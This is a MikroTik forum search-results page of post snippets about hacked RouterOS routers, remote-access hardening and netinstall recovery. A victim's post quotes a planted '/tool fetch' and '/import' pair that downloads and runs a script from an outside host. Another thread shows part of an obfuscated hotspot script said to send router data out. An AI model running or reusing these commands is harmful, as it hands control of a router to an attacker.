Community discussions

Search found 1088 matches: hacked

Searched query: hacked

by Chupaka
Wed Sep 16, 2020 12:03 am
Forum: RouterOS v7 BETA
Topic: v7.1beta2 [development] is released!
Replies: 198
Views: 56986

Re: v7.1beta2 [development] is released!

my router was hacked on this beta version!

Ip of the malware from Hong Kong
Any details?
by Fopwoc
Tue Sep 15, 2020 11:28 pm
Forum: RouterOS v7 BETA
Topic: v7.1beta2 [development] is released!
Replies: 198
Views: 56986

Re: v7.1beta2 [development] is released!

my router was hacked on this beta version!

Ip of the malware from Hong Kong
by bpwl
Sun Sep 13, 2020 11:34 am
Forum: General
Topic: Slow routing, fixed by reboot - how to troubleshoot?
Replies: 13
Views: 572

Re: Slow routing, fixed by reboot - how to troubleshoot?

... the ISP router instead also solving the problem? Seems like it is coming from the internet, but you have no tools to see it. A (root kit) hacked router will not show the offending traffic or heavy loaded resources. It will bypass any protection of your router. You could be a botnet victim. ...
by pe1chl
Tue Sep 08, 2020 11:15 am
Forum: Beginner Basics
Topic: Add MGMT Vlan to DMZ
Replies: 13
Views: 449

Re: Add MGMT Vlan to DMZ

... and access the ESXi host they could still access your MGMT network, but the chance of that happening is less than that your hosts itself are hacked (at least when ESXi is kept up to date).
by davidreaton
Tue Sep 01, 2020 7:19 pm
Forum: General
Topic: Trouble with remote access
Replies: 7
Views: 333

Trouble with remote access

... However, I cannot access it with WinBox. I disabled the firewall rule allowing port 8291 access, because I recall that this simple filter rule was hacked. I can access the router via WinBox on my local LAN, but not remotely. I'm missing something, but don't know what. Help appreciated! My Firewall ...
by martking
Mon Aug 24, 2020 7:13 pm
Forum: Scripting
Topic: My Backup file contains malicious scripts
Replies: 4
Views: 462

Re: My Backup file contains malicious scripts

Looking at that script, I'd say you have been hacked. If you try to go to a website on port 80 you should get an error page appear
by Sob
Mon Aug 24, 2020 2:28 pm
Forum: Scripting
Topic: My Backup file contains malicious scripts
Replies: 4
Views: 462

Re: My Backup file contains malicious scripts

Was the router hacked in the past and did you clean it without netinstalling? Backup can contain also some deleted data.
by mkx
Fri Aug 21, 2020 3:04 pm
Forum: Beginner Basics
Topic: Remote Management Access using Public IP
Replies: 11
Views: 809

Re: Remote Management Access using Public IP

... as my better half would skin me alive if we were hacked due to me taking shortcuts...........

So your own business-case comes with very hard conditions ;-)
by anav
Fri Aug 21, 2020 1:59 pm
Forum: Beginner Basics
Topic: Remote Management Access using Public IP
Replies: 11
Views: 809

Re: Remote Management Access using Public IP

... just for yourself, then the risk is on you to take. I wouldn't do either of the suggested tricks, as my better half would skin me alive if we were hacked due to me taking shortcuts...........
by r00t
Tue Aug 18, 2020 3:50 pm
Forum: Beginner Basics
Topic: RB411 reactivation...
Replies: 2
Views: 215

Re: RB411 reactivation...

... ROS stable version to it. There is no reason why CPU should be too high, RB411 runs perfectly fine with latest ROS version. It may have been hacked, so always better to netinstall hardware you buy used. If you only use RB411 for bridge + wifi, it's fine for 100Mbit/s link. For 3G modem, you ...
by LittleMan
Tue Aug 18, 2020 12:34 am
Forum: General
Topic: What port do I need to forward for remote access using MirotikApp
Replies: 4
Views: 1065

Re: What port do I need to forward for remote access using MirotikApp

... defeats the purpose of the app, I might as well not use it at all and still use the web interface with the current setup. Have yet to see being hacked with a random DDNS address and a random port, accessed once a month or even less; it's similar chance to hacking the VPN tunnel :) I reckon the ...
by sid5632
Fri Aug 14, 2020 3:52 am
Forum: Beginner Basics
Topic: VNC with MikroTik LMT LTE18 router
Replies: 19
Views: 2606

Re: VNC with MikroTik LMT LTE18 router

This whole thread seems a bit pointless, because you really don't want to be running an unencrypted protocol with poor security open to the world in the first place.
Unless you want to get hacked or have information stolen of course...
by anav
Thu Jul 30, 2020 4:24 pm
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

To the OP, you need to download a recent stable version of the software (long term versions are usually good), and then use the netinstall process to get the router back to a clean mode. Do not open the router to the internet on the input chain and do not use any old passwords for the admin. Also li...
by pe1chl
Thu Jul 30, 2020 12:38 pm
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

Ok that is the full info you should have given in your first post. I presume it is still present in your router? You need to netinstall it with format, and NOT restore a backup. So best is to do a clean configuration. At most you can do a /export before you wipe it and keep it as a guide to remember...
by aditrodostress
Thu Jul 30, 2020 12:06 pm
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

I would like to apologize for my mistake. I just want to share, that's all.
Okay, so environment from wlan interface.

I don't know how they get in to router but leaving config like this

I give screenshot from log
Screenshot_5.jpg
Screenshot_7.jpg
Screenshot_8.jpg
sorry for troubling you.
by pe1chl
Thu Jul 30, 2020 11:37 am
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

... from?) with tool fetch. I think originally there was only the screenshot with the environment variables and THAT is not a sign the router was hacked, it is the result of a RouterOS bug. When you have some things a developer did not expect you to do (e.g. renamed wlan1 to something else, or ...
by aditrodostress
Thu Jul 30, 2020 9:46 am
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

Sorry, my bad word. Let me correct: "similar case". I just want to share what happened on my router last day, and found this thread by searching "7wmp0b4s.rsc".
Before the attack happened I already set only enable winbox service with random port & local ip, filter rule drop port scanner.
by Jotne
Thu Jul 30, 2020 8:17 am
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

I guess you all had router opened for remote access using winbox, ssh, telnet or web access. Winbox was hacked some time back and is fixed in later versions. (Lots of scans were done to the winbox port 8291, so 2. in list below would have helped.) VPN is the best option for remote ...
by pe1chl
Wed Jul 29, 2020 8:41 pm
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

What do you mean "the same experience"?? That is not the same, it is something completely different!
It is the result of a bug in RouterOS which is triggered by rename of the wireless interface.
by aditrodostress
Wed Jul 29, 2020 7:44 pm
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

Hey, I also get similar here, my ros is 6.45.9 (long-term)
Screenshot_6.jpg
/tool fetch url=http://spacewb.tech/poll/c59e2b64-8b65-46ed-bcbf-b8ba4c68bd49 mode=http dst-path=7wmp0b4s.rsc
/import 7wmp0b4s.rsc
right now my router reflashed netinstall
by jvanhambelgium
Sun Jul 19, 2020 2:27 pm
Forum: General
Topic: help locating/identifying unknown Mikrotik device
Replies: 5
Views: 1269

Re: help locating/identifying unknown Mikrotik device

... onsite to follow the cable...it should lead to the mysterious box. If the unit is running such old RouterOS it might be completely compromised / hacked if it was ever accessible from the outside world...
by DodoXX
Mon Jul 13, 2020 11:11 am
Forum: Beginner Basics
Topic: Cant netinstall board CRS125
Replies: 0
Views: 123

Cant netinstall board CRS125

Hi, i got probably hacked my router(CA5125-24G-15-AM),it's working but i can't access the router. When i tried to reset, i hold res button(push the res button, plug in and wait) for over 2 min(should be like 10 sec i know) ,but USR1 ...
by adros
Fri Jul 10, 2020 6:58 am
Forum: General
Topic: How secure is my server on an Unsecured VPN
Replies: 1
Views: 461

How secure is my server on an Unsecured VPN

... way too slow. I don't care about securing the VPN data as it's just public cameras. If I used an unsecured VPN, will it become easy to get my server hacked or have someone screw up my RouterOS configuration? Thanks Adros
by jvanhambelgium
Sat Jul 04, 2020 10:40 pm
Forum: Beginner Basics
Topic: Am I protected with this settings?
Replies: 34
Views: 4953

Re: Am I protected with this settings?

... had really some flaws in them in the sense that IF you ever exposed the management interfaces externally (eg. http/https) your device could be hacked! No login needed ;-) I was under the impression that you had a "default" config (with enabled/active firewall rules) hence my remark that ...
by creatin
Tue Jun 30, 2020 12:52 am
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Re: Hacked MTiks, any examples?

Thanks for the tip, Mikrotik on which user test is set and to which I'll be connecting by ssh doesn't have any firewalls enabled,
it's running as AP only.
by sindy
Tue Jun 30, 2020 12:11 am
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Re: Hacked MTiks, any examples?

Login to this user will be available only from a specific IP (which can be configured in user properties) through ssh from another Mikrotik Firewall rules are somewhat less prone to vulnerabilities than the per-user address restrictions as the latter work at application level while the former work ...
by creatin
Tue Jun 30, 2020 12:01 am
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Re: Hacked MTiks, any examples?

Agree with you :)

how big of a risk if user test is created on Mikrotik with read rights only, no password.
Login to this user will be available only from a specific IP (which can be configured in user properties) through ssh from another Mikrotik
by anav
Sat Jun 27, 2020 6:57 pm
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Re: Hacked MTiks, any examples?

You won't get hacked if you use common sense and stick to the default firewall rules until one knows what one is doing. The obvious is change password and winbox port and limit access to the router admin on the LAN side. On the wan ...
by creatin
Sat Jun 27, 2020 6:28 pm
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Re: Hacked MTiks, any examples?

If you want to detect any intrusion by just a script running on the Mikrotik itself, what will not make you happy is that the fact of the intrusion may not be noticeable in the configuration at all. The configuration is just a front-end to the linux running below, and some vulnerabilities in the pa...
by sindy
Sat Jun 27, 2020 1:28 pm
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Re: Hacked MTiks, any examples?

I was thinking of creating a script which would check number of users, their names, number of scripts, when were they created/modified (if possible). Script would run every 30-60 seconds and if there's a change it would send an email notification. If you are creating a honeypot to study malware, th...
by creatin
Sat Jun 27, 2020 12:27 pm
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Re: Hacked MTiks, any examples?

I was thinking of creating a script which would check number of users, their names, number of scripts, when were they created/modified (if possible).
Script would run every 30-60 seconds and if there's a change it would send an email notification.
by msatter
Sat Jun 27, 2020 11:59 am
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Re: Hacked MTiks, any examples?

Sorry, removed.
by erlinden
Sat Jun 27, 2020 11:29 am
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Re: Hacked MTiks, any examples?

CPU usage?
And of course you can check the ROS version manually and probably you know if there is any service available on the WAN site.
by creatin
Sat Jun 27, 2020 3:23 am
Forum: General
Topic: Hacked MTiks, any examples?
Replies: 9
Views: 1937

Hacked MTiks, any examples?

Found a lot of topics related to hacking of Mikrotiks. How do you know or suspect your Mikrotik has been hacked or tampered with? Any examples of MTIKs which were hacked or tampered with by someone other than local admin? New scripts were added? New users created or existing ...
by hammer185
Wed Jun 24, 2020 7:57 pm
Forum: General
Topic: Bridge Port Settings Inquiry
Replies: 0
Views: 411

Bridge Port Settings Inquiry

... from the Torch tool that it was the same as the other traffic that went through and that traffic. At first I thought my Mikrotik devices might be hacked because my networking setup should not allow that but then I realized that if the packets were being tagged in a way I am not familiar with to ...
by sutrus
Tue Jun 23, 2020 6:17 pm
Forum: Wireless Networking
Topic: I WANT TO CONNECT 2 MIKROTIK AP RBwAP2nND WIRELESSLY AND DISTRIBUE WIRELESS INTERNET CONNECTIVITY FROM 2 nd AP RBw AP2
Replies: 11
Views: 1657

Re: I WANT TO CONNECT 2 MIKROTIK AP RBwAP2nND WIRELESSLY AND DISTRIBUE WIRELESS INTERNET CONNECTIVITY FROM 2 nd AP RBw

A little off topic. Why are you using a 2 year old RouterOS?
I don't know exactly, but this very old version was hacked.
First update to the latest version 6.47 or 6.45.9 and Winbox 3,24.
by k6ccc
Mon Jun 22, 2020 7:24 pm
Forum: Beginner Basics
Topic: Remote management
Replies: 2
Views: 519

Re: Remote management

... improve the security of that. Use of a non-standard port, and restricting access by IP. I still do not recommend doing that. WAY TOO EASY to get hacked. Multi-step Port knocking - preferably in conjunction with non-standard ports and IP restrictions gets better. If you have a computer inside ...
by klaus007
Sun Jun 21, 2020 3:15 pm
Forum: Scripting
Topic: Have I been hacked?
Replies: 7
Views: 1845

Re: Have I been hacked?

No not at all. I cannot explain how these scripts were installed on the router (possibly by my wife 😱)
by Jotne
Sun Jun 21, 2020 2:52 pm
Forum: Scripting
Topic: Have I been hacked?
Replies: 7
Views: 1845

Re: Have I been hacked?

Did you use the Hotspot function?
by klaus007
Sun Jun 21, 2020 11:11 am
Forum: Scripting
Topic: Have I been hacked?
Replies: 7
Views: 1845

Re: Have I been hacked?

Thanks to all of you for your recommendations and analysis! My router is running the latest stable and not open to any service on the Internet. There is only me in the LAN with a strong password and WINBOX. I've already set it up from scratch (including NETINSTALL).
Thanks again and have a nice day!
by Jotne
Sun Jun 21, 2020 10:47 am
Forum: Scripting
Topic: Have I been hacked?
Replies: 7
Views: 1845

Re: Have I been hacked?

Some more analyses. I have expanded the script and renamed variables to make it some more readable. First script looks for a hotspot user with name Mikroticket and sets current time/date and mac to the user. Then it seems to send information about the router (time/date/serial number etc) to an externa...
by Jotne
Sun Jun 21, 2020 9:29 am
Forum: Scripting
Topic: Have I been hacked?
Replies: 7
Views: 1845

Re: Have I been hacked?

What version of RouterOS do you have on your router? Can you administrate your router on internet using Winbox (or http/ssh/telnet)? It's clear that this is a hack, since no one would use variable name like this in normal programming: P6oHA7pLvicrO8ub2fa2 :local P6oHA7pLvicrO8ub2fa2 [/ip hotspot user...
by mozerd
Sat Jun 20, 2020 4:52 pm
Forum: Scripting
Topic: Have I been hacked?
Replies: 7
Views: 1845

Re: Have I been hacked?

I would suggest that you reset your CCR to factory default and configure from scratch. If you want to be assured that nothing malicious is taking place then run netinstall and that will clean your system properly. It's NEVER a good thing to see scripts that YOU did not put into the system .... under t...
by mada3k
Sat Jun 20, 2020 3:14 pm
Forum: Scripting
Topic: Have I been hacked?
Replies: 7
Views: 1845

Re: Have I been hacked?

Either that, or some previous owner that used some home-made hotspot-provisioning scripts.

Make sure that you never expose WinBox, API or other services to Internet or users.
by klaus007
Sat Jun 20, 2020 12:54 pm
Forum: Scripting
Topic: Have I been hacked?
Replies: 7
Views: 1845

Have I been hacked?

Hello! Today I found on my CCR1009 two scripts and I don't know them. 1. "mkt_sp_login_1" { :local P6oHA7pLvicrO8ub2fa2 [/ip hotspot user get $user comment]; :local t1x3SUqugohIpoc4o3En ([:find $P6oHA7pLvicrO8ub2fa2 "Mikroticket"]); :if ([:typeof $t1x3SUqugohIpoc4o3En]!="nil") do={ :local BuPRup63sWl...
by erlinden
Tue Jun 09, 2020 12:29 pm
Forum: General
Topic: Accessing Mikrotik through internet Behind Bridged Modem
Replies: 3
Views: 538

Re: Accessing Mikrotik through internet Behind Bridged Modem

... internet by now I understand, but you don't want to provide access to Winbox on your WAN port. If a vulnerability is discovered your router can be hacked. Nevertheless...of course it is possible, but security-wise incredibly stupid.
by eworm
Mon Jun 08, 2020 12:47 pm
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

Yes, except that you do not need to update. Just a reboot is sufficient.
by anav
Mon Jun 08, 2020 12:46 pm
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

Hi lexell, just to be sure you are saying that one has to rename the WIFI back to their original stock names, before upgrading and then change back after upgrading?
After reading about so many issues I am waiting for the patch LOL
by lexell
Mon Jun 08, 2020 10:17 am
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

shahani seems to have named the likely root cause of this in this ROS v6.47 release thread post : Solution to Error while running customized default configuration script: no such item Whenever you see this error when using wireless devices while booting It's possible you have changed the pre-writte...
by pe1chl
Sun Jun 07, 2020 12:27 pm
Forum: Announcements
Topic: v6.47 [stable] is released!
Replies: 349
Views: 93160

Re: v6.47 [stable] is released!

pe1chl - What is the reason to believe that the router was hacked? Because there was that hack where "upgrade" would always install a fixed version even when it was lower, presumably to get back to a vulnerable version. (a couple of scripts and changed ...
by llubik
Sat Jun 06, 2020 6:23 pm
Forum: Announcements
Topic: v6.47 [stable] is released!
Replies: 349
Views: 93160

Re: v6.47 [stable] is released!

pe1chl - What is the reason to believe that the router was hacked? llubik - Please provide output of these commands - "tool fetch url="http://upgrade.mikrotik.com/routeros/LATEST.6" output=user", ":put [:resolve upgrade.mikrotik.com]". [l@MKT] > tool ...
by pe1chl
Sat Jun 06, 2020 12:48 pm
Forum: Announcements
Topic: v6.47 [stable] is released!
Replies: 349
Views: 93160

Re: v6.47 [stable] is released!

pe1chl - What is the reason to believe that the router was hacked? Because there was that hack where "upgrade" would always install a fixed version even when it was lower, presumably to get back to a vulnerable version. (a couple of scripts and changed ...
by strods
Sat Jun 06, 2020 8:14 am
Forum: Announcements
Topic: v6.47 [stable] is released!
Replies: 349
Views: 93160

Re: v6.47 [stable] is released!

pe1chl - What is the reason to believe that the router was hacked?
llubik - Please provide output of these commands - "tool fetch url="http://upgrade.mikrotik.com/routeros/LATEST.6" output=user", ":put [:resolve upgrade.mikrotik.com]".
by pe1chl
Fri Jun 05, 2020 6:48 pm
Forum: Announcements
Topic: v6.47 [stable] is released!
Replies: 349
Views: 93160

Re: v6.47 [stable] is released!

This likely means your router has been hacked. It is advisable to do a clean netinstall. do you mean netinstall or just Reset Configuration (hw reset and download default configuration)? A clean netinstall = download the netinstall program and ...
by mkx
Fri Jun 05, 2020 6:41 pm
Forum: General
Topic: [CCR1009-7G-1C-1S+] No Backup possible - file operation error
Replies: 1
Views: 588

Re: [CCR1009-7G-1C-1S+] No Backup possible - file operation error

Another possibility is that router has been hacked ... some hacks include pretty well hidden scripts which block certain operations. If this happened in your case, then the only way out is netinstall ...
by llubik
Fri Jun 05, 2020 6:31 pm
Forum: Announcements
Topic: v6.47 [stable] is released!
Replies: 349
Views: 93160

Re: v6.47 [stable] is released!

[quote]
This likely means your router has been hacked. It is advisable to do a clean netinstall.
[/quote]

Do you mean netinstall or just Reset Configuration (hw reset and download default configuration)?
by pe1chl
Fri Jun 05, 2020 5:24 pm
Forum: Announcements
Topic: v6.47 [stable] is released!
Replies: 349
Views: 93160

Re: v6.47 [stable] is released!

Something is wrong somewhere. Manually updated 6.46.3 to 6.46.6

/system package update install
download 6.46.3 and instal . . . :-(
This likely means your router has been hacked. It is advisable to do a clean netinstall.
by jefferyf
Thu Jun 04, 2020 10:41 pm
Forum: General
Topic: PPPoE and OSPF drops
Replies: 18
Views: 3798

Re: PPPoE and OSPF drops

... 10 sessions you don't see this problem? That makes it seem like the source is something else. I wonder if perhaps some malfunctioning or hacked device is creating many connections in the connection tracking table, overwhelming it. Sorry for the delay. Yeah it could be that, I'm in the ...
by mrmut
Mon Jun 01, 2020 8:50 am
Forum: Wireless Networking
Topic: How to enable only-n on CAPsMAN?
Replies: 0
Views: 455

How to enable only-n on CAPsMAN?

... turning off G rates (B were turned off already) and OFDM was gone. Now I have BW: 1x SGI: 1x HT:0-15 rates only. Did I do this correctly, or I hacked a wrong thing?
by cezars
Mon Jun 01, 2020 12:44 am
Forum: Scripting
Topic: Help with firewall
Replies: 12
Views: 2225

Re: Help with firewall

No I think the OP wants to be hacked, he should find older firmware and just use winbox open to the internet. Seriously, concur with Jotne, PPTP is no easier than more secure protocols to implement. Also, the extra load and config mess ...
by anav
Mon Jun 01, 2020 12:37 am
Forum: Scripting
Topic: Help with firewall
Replies: 12
Views: 2225

Re: Help with firewall

No I think the OP wants to be hacked, he should find older firmware and just use winbox open to the internet. Seriously, concur with Jotne, PPTP is no easier than more secure protocols to implement. Also, the extra load and config mess caused ...
by anav
Sun May 31, 2020 8:43 pm
Forum: Beginner Basics
Topic: Router doesn't appear in Winbox interface despite reset procedure
Replies: 10
Views: 1735

Re: Router doesn't appear in Winbox interface despite reset procedure

The firmware is so old it's almost comical if not the fact that you obviously didn't buy it new but from someone second hand.
Download the latest stable software and then USE NETINSTALL to make sure you are starting from a good clean (not hacked) firmware.
Come back when you need assistance after
by anav
Sat May 30, 2020 7:56 pm
Forum: Beginner Basics
Topic: My first Hex, help to config
Replies: 2
Views: 508

Re: My first Hex, help to config

... that is extremely old. Did it come to you already configured? if so, it might be best to do a netinstall process in case the router was ever hacked in the past. Wipes the slate clean so you start fresh. Also some advice I gave to another new MT user. No worries, okay so it is normal at the ...
by Jotne
Wed May 27, 2020 8:08 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

Or you can keep the IPSec open but add QoS and give them a very slow connection, like 1kbps.
Also log all their traffic and see where they go.
You can also redirect port 80/443 to a specific web server, so same web page opens all the time.
by anav
Wed May 27, 2020 4:20 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

Ahh okay, I see a log, to know if........... that makes sense.
Then the following is also valid,
Detect, then block lanip.
Then find out who is pissed off that their internet doesn't work anymore.
I like it!!!
by sindy
Wed May 27, 2020 3:06 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

Now, let's get back to the question asked........ ;-P So you are saying it is worth it, or a waste of time......??.... OK, if you put it this way, then no, I don't see much value in using it. Most malware will attack public addresses anyway. Out of curiosity, you may add it and let it log, to see whe...
by Jotne
Wed May 27, 2020 2:46 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

Others will say this approach makes no sense, why go through all the hassle of doing this : just drop any packet that is not part of a session or targeted towards non DNAT'ed ports and get on with your life ;-) and don't even bother logging this "noise" that exists "by default" 99.999% of these att...
by anav
Wed May 27, 2020 2:32 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

I saw this in best practices wiki, don't use it but do you see value in adding to the default setup..........? This rule just prevents your uplink bandwidth from being wasted by ill-configured software or malware running on devices in your LAN. Let me rephrase my question so it fits the answer... " ...
by sindy
Wed May 27, 2020 2:29 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

I saw this in best practices wiki, don't use it but do you see value in adding to the default setup..........?
This rule just prevents your uplink bandwidth from being wasted by ill-configured software or malware running on devices in your LAN.
by anav
Wed May 27, 2020 2:26 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

I saw this in best practices wiki, don't use it but do you see value in adding to the default setup..........? add action=drop chain=forward comment="Drop tries to reach non-public addresses from LAN" dst-address-list=not_in_internet in-interface=bridge1 (where the list is the usual bogon list - of c...
by jvanhambelgium
Wed May 27, 2020 2:09 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

I don't use "tarpit". It will only consume more resources (cpu/mem) on your side with the idea to slow the attacker down by holding the connection, but... For metered connections, only your upstream ISP can truly provide some useful action. If the packet hits your interface, it consumed already band...
by sindy
Wed May 27, 2020 2:02 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

Is there a different mitigation for a "metered" (E.G. 4G subscription) versus an "unmetered" connection (E.G. DSL line, cable modem, FTH, ...) ? The ISP is mostly filtering already quite a lot on mobile connections. Nobody mentioned "tarpit" as protection: https://wiki.mikrotik.com/wiki/DoS_attack_...
by bpwl
Wed May 27, 2020 1:48 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

But I do it purely out of interest ;-) (just like yourself I guess) Is there a different mitigation for a "metered" (E.G. 4G subscription) versus an "unmetered" connection (E.G. DSL line, cable modem, FTH, ...) ? The ISP is mostly filtering already quite a lot on mobile connections. Nobody mentione...
by jvanhambelgium
Wed May 27, 2020 1:30 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

I have an access rule that if anyone tries one port that is not open on the outside, he will be blocked for 24 hour on any port. This gives me an access list with from 2000 to 15000 IPs at any time. If this for some reason is me that has been blocked from outside, I can use port knock to whitelist ...
by msatter
Wed May 27, 2020 12:19 pm
Forum: General
Topic: Strange file have in mikrotik
Replies: 2
Views: 494

Re: Strange file have in mikrotik

They are not proud of this but it does exists at least:

https://blog.mikrotik.com/security/

This is the last one whose router was hacked:
viewtopic.php?f=2&t=161521
by Jotne
Wed May 27, 2020 9:13 am
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

I have an access rule that if anyone tries one port that is not open on the outside, he will be blocked for 24 hour on any port. This gives me an access list with from 2000 to 15000 IPs at any time. If this for some reason is me that has been blocked from outside, I can use port knock to whitelist m...
by jvanhambelgium
Wed May 27, 2020 7:46 am
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

Somedays I think I need a hardware FW in front of my router...If MT can focus on security with every new release, I will stick with them...if not...will be time to give up on MT after 8 years and move onto something else. There is no such thing as "a hardware firewall" . Sure there are brands with ...
by kd2pm2
Wed May 27, 2020 4:41 am
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

I had that happen to me a few years ago. That's when I learned to turn off (after I upgraded my package and firmware) pretty much everything including mac telnet, turning off admin user and firewalling port 8291 from the internet. Since then I get the occasional DNS and port scan attacks but no acces...
by mutluit
Tue May 26, 2020 9:02 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

"Security analysis of recent RouterOS exploits" by Tomas Kirnak (Atris Spol. s r.o., Slovakia) English presentation given on Mar 08, 2019 at the MikroTik User Meeting (MUM) in Vienna, Austria, March 07 - 08, 2019. Video (39 minutes) on Vault7 (CIA/NSA) hacking attacks by some botnets to MikroTik rou...
by mducharme
Tue May 26, 2020 8:35 pm
Forum: General
Topic: PPPoE and OSPF drops
Replies: 18
Views: 3798

Re: PPPoE and OSPF drops

... 10 sessions you don't see this problem? That makes it seem like the source is something else. I wonder if perhaps some malfunctioning or hacked device is creating many connections in the connection tracking table, overwhelming it.
by Jotne
Tue May 26, 2020 1:49 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

However, keep in mind I had a strong password. Strong password is not enough if this was used to administrate the box from outside (internet). Use VPN to administrate your box. If you can not use VPN, use: 1. Use another port than default. 2. Use port knocking. This prevents someone from seeing op...
by Cha0s
Tue May 26, 2020 1:30 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

[joking]
I am using Windows 95, they have been working great for the last 25 years without any updates!
I've also been using no firewall, since firewalls are for newbs.

But, today I logged in only to find out that they were hacked!

How could this have happened???
[/joking]
by bpwl
Tue May 26, 2020 1:02 am
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

Are you sure I need to do a clean netinstall to save the device? According to MikroTik I should 1. Upgrade 2. Change Password 3. Make sure winbox is only accessed from my network I just want to make my information right, thanks for all replies and I've already learned a lot. See the youtube presentat...
by Defraged
Tue May 26, 2020 12:06 am
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

Are you sure I need to do a clean netinstall to save the device?
According to MikroTik I should

1. Upgrade
2. Change Password
3. Make sure winbox is only accessed from my network

I just want to make my information right, thanks for all replies and I've already learned a lot.
by mutluit
Sun May 24, 2020 6:13 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

